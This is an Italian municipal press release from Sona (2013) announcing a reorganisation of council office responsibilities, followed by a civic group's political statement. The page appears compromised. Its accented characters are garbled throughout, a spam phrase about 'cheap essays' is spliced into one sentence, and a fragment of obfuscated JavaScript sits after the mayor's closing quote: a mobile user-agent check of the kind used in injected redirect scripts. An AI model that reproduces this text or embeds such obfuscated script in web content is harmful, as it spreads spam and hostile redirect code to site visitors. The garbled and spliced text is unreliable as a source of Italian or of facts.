La nuova Amministrazione vuole partire con il piede giusto e ridisegna l’organizzazione del Comune.

COMUNICATO STAMPA

Sona, 1 Settembre 2013

Sona: la nuova Amministrazione vuole partire con il piede giusto e ridisegna l’organizzazione del Comune

Il 1Ai?? Settembre prossimo gli uffici comunali di Sona (Verona) subiranno una vera e propria rivoluzione ai vertici: il Sindaco e la Giunta hanno ritenuto di variare la gran parte delle attribuzioni organizzative dei responsabili di settore, compresa la funzione del Segretario Generale.

“Dal 1Ai?? Settembre prossimo si A? ritenuto di proporre il convenzionamento del servizio di Segreteria Generale con altro Comune – afferma il Sindaco Gianluigi Mazzi -, che garantirAi?? comunque la presenza del Segretario Generale Dott. Triggiani Spiridione Antonio presso questo Comune per il 60% delle ore settimanali. Nel contempo, si procederAi?? ad una redistribuzione degli incarichi di responsabile di ufficio.”

Oltre alla grossa novitAi?? legata al convenzionamento della figura del Segretario Generale, tra le principali variazioni vi sono quelle legate allo sport e alle associazioni per le quali il Dott. Ennio Baldo sarAi?? il nuovo responsabile. Il delicato settore degli interventi sociali transiterAi?? dallo stesso Baldo alla Dott.ssa Simonetta Arduini, la quale assumerAi?? la funzione anche degli interventi scolastici, del lavoro, della famiglia e dell’economia.

Molte le variazioni che coinvolgono la responsabile Rag. Simonetta Ventura che vedrAi?? go to this web portal cheap essays. attribuite le competenze di segreteria generale, contratti, gare ed appalti, protocollo e informatica.

Alla Dott.ssa Raffaella Tessaro sarAi?? aggiunta, in particolare, la responsabilitAi?? sul turismo, nuova delega fortemente voluta dalla nuova Amministrazione al fine di valorizzare lo splendido territorio sonese.

“Non si A? voluto snaturare l’intero organigramma del Comune di Sona ma si A? scelto di intervenire rivedendo e riorganizzando l’operativitAi?? delle figure apicali – afferma il Sindaco Gianluigi Mazzi -. Gli obiettivi principali che hanno ispirato questo provvedimento sono stati quelli di valorizzare al massimo le professionalitAi?? presenti”.

“L’Amministrazione comunaleAi??fin dal suo insediamento ha messo in atto tutte le azioni necessarie per ricreare un clima disteso e di collaborazione tra i dipendenti e gli uffici – dice il Sindaco Gianluigi Mazzi -. C’A? ancora tanto da fare ma A? noto come un buon clima con tutti i collaboratori rappresenti la premessa per il miglior risultato. E questa riorganizzazione va proprio nella giusta direzione” conclude. -|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.